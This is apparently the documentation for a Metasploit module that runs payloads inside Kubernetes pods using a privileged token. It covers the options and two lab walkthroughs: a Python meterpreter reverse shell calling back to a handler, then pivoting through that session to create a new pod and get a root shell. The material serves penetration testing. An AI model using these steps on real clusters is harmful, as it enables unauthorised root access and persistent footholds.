123 lines
4.6 KiB
Markdown
123 lines
4.6 KiB
Markdown
## Vulnerable Application
|
|
|
|
### Description
|
|
|
|
Execute a payload within a Kubernetes pod.
|
|
|
|
## Verification Steps
|
|
|
|
1. Start msfconsole
|
|
2. Do: `use exploit/multi/kubernetes/exec`
|
|
3. Set the required options
|
|
4. Do: `run`
|
|
5. You should get a shell.
|
|
|
|
## Options
|
|
|
|
### SESSION
|
|
An optional session to use for configuration. When specified, the values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT`
|
|
will be gathered from the session host. This requires that the session be on an existing Kubernetes pod. The necessary
|
|
values may not always be present.
|
|
|
|
Setting this option will also automatically route connections through the specified session.
|
|
|
|
### TOKEN
|
|
The JWT token. The token with the necessary privileges to access the exec endpoint within a running pod and optionally
|
|
create a new pod.
|
|
|
|
### POD
|
|
The pod name to execute in. When not specified, a new pod will be created with an entrypoint that allows it to run
|
|
forever. After creation, the pod will be used to execute the payload. **The created pod is not automatically cleaned
|
|
up.** A note containing the created pod's information will be added to the database when it is connected.
|
|
|
|
### NAMESPACE
|
|
The Kubernetes namespace that the `TOKEN` has permissions for and that `POD` either exists in or should be created in.
|
|
|
|
### SHELL
|
|
The shell to use for execution. `bash` is likely preferred from a usability perspective, but is not present as often as
|
|
`sh` is.
|
|
|
|
### PodName
|
|
*This is an advanced option.*
|
|
|
|
The image from which to create the pod. When a new pod is created (`POD` is blank), this option can be used to specify
|
|
the image that is used. If this option is blank, each image will be tried from the list of running pods until one
|
|
successfully starts.
|
|
|
|
### TARGET
|
|
#### Interactive WebSocket
|
|
Communicate directly with the pod using the Kubernetes WebSocket API. This is the most similar option to the `kubectl
|
|
exec --stdin --tty` command. No Metasploit payload is transferred to the target.
|
|
|
|
### Unix Command
|
|
Run the specified command payload and read the output. Custom commands can be run with the `cmd/unix/generic` payload.
|
|
|
|
### Linux Dropper
|
|
Use a command stager to transfer a Metasploit payload to the target and execute it. This will result in the payload
|
|
being written to disk and will require potentially non-standard binaries to be present on the remote system, depending
|
|
on the selected `CMDSTAGER::FLAVOR` option.
|
|
|
|
### Python
|
|
Run a Python payload on the remote host. This technique will automatically find and use either a `python`, `python3`, or
|
|
`python2` binary on the remote system to use for execution.
|
|
|
|
## Scenarios
|
|
|
|
### Kubernetes v1.22.1
|
|
In this scenario, Metasploit has direct access to the Kubernetes API. A known token is used to execute a Python payload
|
|
within the `thinkphp-67f7c88cc9-tgpfh` pod.
|
|
|
|
```
|
|
msf6 > use exploit/multi/kubernetes/exec
|
|
[*] Using configured payload python/meterpreter/reverse_tcp
|
|
msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
|
|
TOKEN => eyJhbGciOiJSUzI1...
|
|
msf6 exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh
|
|
POD => thinkphp-67f7c88cc9-tgpfh
|
|
msf6 exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31
|
|
RHOSTS => 192.168.159.31
|
|
msf6 exploit(multi/kubernetes/exec) > set TARGET Python
|
|
TARGET => Python
|
|
msf6 exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp
|
|
PAYLOAD => python/meterpreter/reverse_tcp
|
|
msf6 exploit(multi/kubernetes/exec) > run
|
|
|
|
[*] Started reverse TCP handler on 192.168.159.128:4444
|
|
[*] Sending stage (39736 bytes) to 192.168.159.31
|
|
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:59234) at 2021-10-01 09:55:00 -0400
|
|
|
|
meterpreter > getuid
|
|
Server username: root
|
|
meterpreter > sysinfo
|
|
Computer : thinkphp-67f7c88cc9-tgpfh
|
|
OS : Linux 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021
|
|
Architecture : x64
|
|
Meterpreter : python/linux
|
|
meterpreter > background
|
|
[*] Backgrounding session 1...
|
|
msf6 exploit(multi/kubernetes/exec) >
|
|
```
|
|
|
|
Next, the compromised session is used to access the internal Kubernetes endpoint, create a new pod and open a shell
|
|
directly via a WebSocket.
|
|
|
|
```
|
|
msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
|
|
TARGET => Interactive WebSocket
|
|
msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
|
|
|
|
[*] Routing traffic through session: 1
|
|
[+] Kubernetes service host: 10.96.0.1:443
|
|
[*] Using image: busybox
|
|
[+] Pod created: burhgvzc
|
|
[*] Waiting for the pod to be ready...
|
|
[+] Successfully established the WebSocket
|
|
[*] Found shell.
|
|
[*] Command shell session 2 opened (172.17.0.31:59437 -> 10.96.0.1:443) at 2021-10-01 10:05:57 -0400
|
|
|
|
id
|
|
uid=0(root) gid=0(root) groups=10(wheel)
|
|
pwd
|
|
/
|
|
```
|